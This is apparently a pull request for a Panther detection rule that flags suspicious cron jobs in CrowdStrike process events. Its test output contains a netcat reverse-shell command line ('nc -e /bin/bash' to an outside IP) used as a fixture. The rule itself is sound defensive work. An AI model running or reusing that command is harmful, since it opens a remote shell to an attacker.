### PR TITLE
Crowdstrike Suspicious Cron

### DIFF
--- a/rules/crowdstrike_rules/crowdstrike_suspicious_cron.py
+++ b/rules/crowdstrike_rules/crowdstrike_suspicious_cron.py
@@ -2,10 +2,10 @@ import shlex
 from fnmatch import fnmatch
 
 from panther_base_helpers import (
+    crowdstrike_detection_alert_context,
     deep_get,
     filter_crowdstrike_fdr_event_type,
-    crowdstrike_detection_alert_context,
-    get_crowdstrike_field
+    get_crowdstrike_field,
 )
 
 SUSPICIOUS_CRON_CMD_ARGS = {
@@ -50,6 +50,7 @@ def rule(event):
 
 
 def title(event):
+    # pylint: disable=line-too-long
     return f"Suspicious cron found on aid [{get_crowdstrike_field(event, 'aid', default=''), '<UNKNOWN_HOST>'}]"
 
 

--- a/rules/crowdstrike_rules/crowdstrike_suspicious_cron.yml
+++ b/rules/crowdstrike_rules/crowdstrike_suspicious_cron.yml
@@ -53,7 +53,7 @@ Tests:
         "fdr_event_type": "ProcessRollup2",
         "p_log_type": "Crowdstrike.FDREvent",
       }
-  - Name: Not Suspicious
+  - Name: Not suspicious
     ExpectedResult: false
     Log:
       {


### PR DESCRIPTION
### Background

- Adds new Crowdstrike rule that alerts on suspicious cron commands in ProcessRollup2 events

```
pipenv run panther_analysis_tool test --filter RuleID=Crowdstrike.SuspiciousCron

[INFO][root]: Testing analysis items in .

Crowdstrike.SuspiciousCron
        [PASS] Suspicious - netcat listener
                [PASS] [rule] true
                [PASS] [title] Suspicious cron found on aid [('bf5d6f13fdad4264a09ce0162997a8cf', '<UNKNOWN_HOST>')]
                [PASS] [dedup] Suspicious cron found on aid [('bf5d6f13fdad4264a09ce0162997a8cf', '<UNKNOWN_HOST>')]
                [PASS] [alertContext] {"user": "", "console-link": "", "commandline": "nc -e /bin/bash 237.233.242.58 80", "parentcommandline": "", "filename": "", "filepath": "", "description": "", "action": ""}
        [PASS] Suspicious - wget
                [PASS] [rule] true
                [PASS] [title] Suspicious cron found on aid [('bf5d6f13fdad4264a09ce0162997a8cf', '<UNKNOWN_HOST>')]
                [PASS] [dedup] Suspicious cron found on aid [('bf5d6f13fdad4264a09ce0162997a8cf', '<UNKNOWN_HOST>')]
                [PASS] [alertContext] {"user": "", "console-link": "", "commandline": "nc -e /bin/bash 237.233.242.58 80", "parentcommandline": "", "filename": "", "filepath": "", "description": "", "action": ""}
        [PASS] Not suspicious
                [PASS] [rule] false

--------------------------
Panther CLI Test Summary
        Path: .
        Passed: 1
        Failed: 0
        Invalid: 0
```